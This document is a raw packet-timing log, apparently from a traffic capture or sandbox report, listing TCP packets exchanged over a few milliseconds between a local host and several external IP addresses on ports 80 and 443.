                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934865952 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934876919 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934884071 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934890032 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934902906 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934906960 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934937000 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.934950113 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935134888 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935153008 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935163975 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935175896 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935179949 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935188055 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935199022 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935205936 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935209990 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935221910 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935221910 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935235977 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935242891 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935250044 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935261011 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935270071 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935272932 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935285091 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935290098 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935300112 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935318947 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935345888 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935523033 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935534954 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935575008 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935597897 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935676098 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935688019 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935698986 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935724974 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935725927 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935743093 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935753107 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935758114 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935766935 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935779095 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935786009 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935791969 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935801983 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935802937 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935817003 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935827971 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935831070 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935838938 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935848951 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935849905 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935864925 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935875893 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935880899 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935888052 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935897112 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935904026 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935914040 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935923100 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935925961 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935942888 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935945988 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935957909 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.935977936 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936002016 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936584949 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936595917 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936605930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936611891 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936616898 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936628103 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936635971 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936640024 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936650991 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936661005 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936672926 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936681986 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936683893 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936695099 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936706066 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936712980 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936719894 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936721087 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936731100 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936739922 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936743975 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936754942 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936758041 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936763048 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936769009 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936784029 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936784029 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936808109 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.936943054 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937150002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937161922 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937172890 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937184095 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937191010 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937196970 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937207937 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937220097 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937231064 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937232971 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937246084 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937254906 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937258959 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937264919 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937284946 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937294960 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937300920 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937308073 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937319994 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937324047 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937331915 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937342882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937350035 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937355042 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937366009 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937371969 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937376976 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937382936 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937395096 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937405109 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937407017 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937427044 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937439919 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.937474966 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938040018 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938051939 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938061953 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938074112 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938085079 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938086033 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938097954 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938105106 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938112020 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938132048 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938143969 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938149929 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938157082 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938169003 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938177109 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938183069 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938196898 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938199043 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938210011 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938220978 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938225985 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938231945 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938245058 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938260078 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938261986 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938273907 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938278913 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938286066 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938298941 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938311100 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938322067 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938333988 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938338041 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938345909 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938357115 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938381910 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938397884 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938934088 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938946009 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938956976 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938967943 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938978910 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938983917 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.938991070 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.939002991 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.939011097 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.939019918 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.939064980 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.939081907 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941577911 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941612005 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941622019 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941663027 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941675901 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941693068 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941720009 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941752911 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941764116 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941775084 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941787004 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941793919 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941800117 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941883087 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941883087 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941931963 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941943884 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941956043 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941967964 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941977024 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941982031 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.941994905 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942002058 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942008972 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942023993 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942039967 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942078114 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942089081 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942101955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942117929 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942142010 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942262888 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942274094 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942286968 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942306995 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942337036 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942342997 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942359924 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942373037 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942384005 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942389011 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942411900 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942433119 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942461014 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942471981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942482948 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942506075 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942514896 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942519903 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942528963 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942539930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942557096 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942579985 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942698002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942708969 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942718983 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942729950 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942742109 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942745924 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942754984 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942763090 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942769051 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942781925 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942809105 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942817926 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942857981 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942890882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942931890 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942944050 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942955971 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942965984 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.942981958 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943000078 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943043947 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943057060 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943073034 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943083048 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943084002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943109035 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.943135977 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.959917068 CEST8049723162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.959969997 CEST4972380192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.960323095 CEST8049723162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.960408926 CEST4972380192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.960408926 CEST4972380192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.960830927 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.960870981 CEST44349726162.241.61.218192.168.2.9
